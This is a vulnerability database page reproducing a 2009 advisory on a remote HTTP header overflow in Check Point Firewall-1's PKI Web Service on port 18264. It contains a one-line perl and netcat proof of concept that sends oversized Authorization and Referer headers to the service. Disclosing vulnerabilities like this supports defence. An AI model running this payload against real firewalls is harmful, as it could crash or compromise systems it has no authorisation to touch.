Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21566
HistoryApr 01, 2009 - 12:00 a.m.

Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

2009-04-0100:00:00
vulners.com
30
JSON

  • Check Point Firewall-1 PKI Web Service HTTP Header Remote Overflow

  • Description

The Check Point Firewall-1 PKI Web Service, running by default on TCP
port 18264, is vulnerable to a remote overflow in the handling of very
long HTTP headers. This was discovered during a pen-test where the
client would not allow further analysis and would not provide the full
product/version info. Initial testing indicates the 'Authorization'
and 'Referer' headers were vulnerable.

  • Product

Check Point, Firewall-1, unknown

  • PoC

perl -e 'print "GET / HTTP/1.0\r\nAuthorization: Basic" . "x" x 8192 .
"\r\nFrom: [email protected]\r\nIf-Modified-Since: Fri, 13 Dec 2006
09:12:58 GMT\r\nReferer: http://www.owasp.org/" . "x" x 8192 .
"\r\nUserAgent: FsckResponsibleDisclosure 1.0\r\n\r\n"' | nc
suckit.com 18264

  • Solution

None

  • Timeline

2006-11-06: Vulnerability Discovered
2009-03-29: Disclosed to Public

BugsNotHugs
Shared Vulnerability Disclosure Account

JSON